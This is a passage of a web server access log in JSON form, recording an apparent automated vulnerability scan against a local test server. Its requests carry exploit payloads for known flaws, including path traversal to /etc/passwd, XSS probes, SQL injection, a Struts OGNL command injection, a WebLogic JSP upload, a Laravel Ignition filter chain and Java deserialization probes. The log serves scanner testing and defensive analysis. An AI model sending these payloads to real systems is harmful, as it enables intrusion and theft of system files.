c9v8hn0smpv8c57g0t00zg1f5misnc7gj.oast.live:80/ HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"sidefunc=update&syear=111'","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /Side.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.099","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/device_graph_page.php?is2sim=%22zlo%20onerror=alert(1)%20%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.113","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/login.html?lang=en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.285","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /catalog.php?filename=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.002","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"http:","request":"GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.206","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /menu/neo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"setting_id=general&BasicConfigOptions.workDir=%2Fu01%2Foracle%2Fuser_projects%2Fdomains%2Fbase_domain%2Fservers%2FAdminServer%2Ftmp%2F_WL_internal%2Fcom.oracle.webservices.wls.ws-testclient-app-wls%2F4mcj4y%2Fwar%2Fcss&BasicConfigOptions.proxyHost=&BasicConfigOptions.proxyPort=80","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ws_utc/resources/setting/options HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.213","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xmldata?item=all HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plus/carbuyaction.php?dopost=return&code=../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.215","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /groovyconsole HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22password\x22:\x22public\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v4/auth HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vr2conf/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"name=%25%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3f%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3d%23%64%6d%29%3a%28%28%23%63%6f%6e%74%61%69%6e%65%72%3d%23%63%6f%6e%74%65%78%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%3d%23%63%6f%6e%74%61%69%6e%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%6f%6e%74%65%78%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%29%29%2e%28%23%71%3d%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%27%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%2e%28%23%71%29%7d&age=10&__checkbox_bustedBefore=true&description=\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /integration/saveGangster.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"http:","request":"GET /cs/Satellite?destpage=\x22&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"------WebKitFormBoundaryuim0dyiDSPBPu31g\x0D\x0AContent-Disposition: form-data; name=\x22ks_name\x22\x0D\x0A\x0D\x0A297MbJXGyCIudFwFojBiHgkep6L\x0D\x0A------WebKitFormBoundaryuim0dyiDSPBPu31g\x0D\x0AContent-Disposition: form-data; name=\x22ks_edit_mode\x22\x0D\x0A\x0D\x0Afalse\x0D\x0A------WebKitFormBoundaryuim0dyiDSPBPu31g\x0D\x0AContent-Disposition: form-data; name=\x22ks_password_front\x22\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundaryuim0dyiDSPBPu31g\x0D\x0AContent-Disposition: form-data; name=\x22ks_password\x22\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundaryuim0dyiDSPBPu31g\x0D\x0AContent-Disposition: form-data; name=\x22ks_password_changed\x22\x0D\x0A\x0D\x0Afalse\x0D\x0A------WebKitFormBoundaryuim0dyiDSPBPu31g\x0D\x0AContent-Disposition: form-data; name=\x22ks_filename\x22; filename=\x22297MbJXGyCIudFwFojBiHgkep6L.jsp\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A<%@ page import=\x22java.util.*,java.io.*\x22%>\x0D\x0A<%@ page import=\x22java.security.MessageDigest\x22%>\x0D\x0A\x0D\x0A<%\x0D\x0AString cve = \x22CVE-2018-2894\x22;\x0D\x0AMessageDigest alg = MessageDigest.getInstance(\x22MD5\x22);\x0D\x0Aalg.reset();\x0D\x0Aalg.update(cve.getBytes());\x0D\x0Abyte[] digest = alg.digest();\x0D\x0AStringBuffer hashedpasswd = new StringBuffer();\x0D\x0AString hx;\x0D\x0Afor (int i=0;i\x0D\x0A------WebKitFormBoundaryuim0dyiDSPBPu31g--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ws_utc/resources/setting/keystore HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5(1234567890)),1)%23]=bob&name[0]=a","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?q=node&destination=node HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.243","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.250","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.253","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /query-api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.225","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.236","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sitecore/login/default.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.050","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lucee/admin/web.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /init.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db/schema.rb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cluster/cluster HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Ajax_url_encode.php?link_url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"\xAC\xED\x00\x05sr\x00\x13java.util.ArrayListx\x81\xD2\x1D\x99\xC7a\x9D\x03\x00\x01I\x00\x04sizexp\x00\x00\x00\x02w\x04\x00\x00\x00\x02t\x00\x09element 1t\x00\x09element 2x","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /invoker/JMXInvokerServlet/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /query-explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php/%3C/script%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/?page=cnss_social_icon_page HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php-fpm.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/47 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.232","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"\xAC\xED\x00\x05sr\x00\x13java.util.ArrayListx\x81\xD2\x1D\x99\xC7a\x9D\x03\x00\x01I\x00\x04sizexp\x00\x00\x00\x02w\x04\x00\x00\x00\x02t\x00\x09element 1t\x00\x09element 2x","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /invoker/EJBInvokerServlet/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /query-laravel HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"{\x22metadata\x22:{\x22order_id\x22:\x221 and updatexml(1,concat(0x7e,(SELECT md5(202072102)),0x7e),1)\x22},\x22status\x22:2}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/48 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: 